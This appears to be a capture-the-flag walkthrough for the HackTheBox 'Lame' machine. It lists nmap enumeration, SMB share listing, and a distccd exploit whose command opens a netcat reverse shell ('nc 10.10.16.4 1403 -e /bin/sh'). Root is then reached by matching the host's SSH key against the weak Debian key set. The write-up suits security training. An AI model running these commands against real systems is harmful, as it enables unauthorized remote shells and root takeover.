Skip to content

Latest commit

 

History

History
21 lines (21 loc) · 1.8 KB

File metadata and controls

21 lines (21 loc) · 1.8 KB

Enumeration

  • Running nmap we found nmap -p21,22,139,445,3632 -A -T4 -Pn 10.10.10.3
  • Found exploits for distccd and for ftp

SMB

  • using smbclient -L \\10.10.10.3\\ we found smb folders:
  • ADMIN,IPC and opt are password protected

Exploiting

Distccd(3632)

  • Trying to exploit distccd we gain root access:https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
  • python2 distccd_exploit.py -t 10.10.10.3 -p 3632 -c "nc 10.10.16.4 1403 -e /bin/sh"
  • We listen using netcat nc -lvp 1403
  • After gaining access updatedb and locate user.txt and to collect flag
  • then navigate to /root and use ls -la to list all files:
  • we find the ssh key in .ssh
  • we use https://github.com/g0tmi1k/debian-ssh and use tar jxf debian_ssh_rsa_2048_x86.tar.bz2
  • use grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7b wkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub to find matching public key:57c3115d77c56390332dc5c49978627a-5429.pub
  • Then ssh into root with ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]

Using samba usermap(139)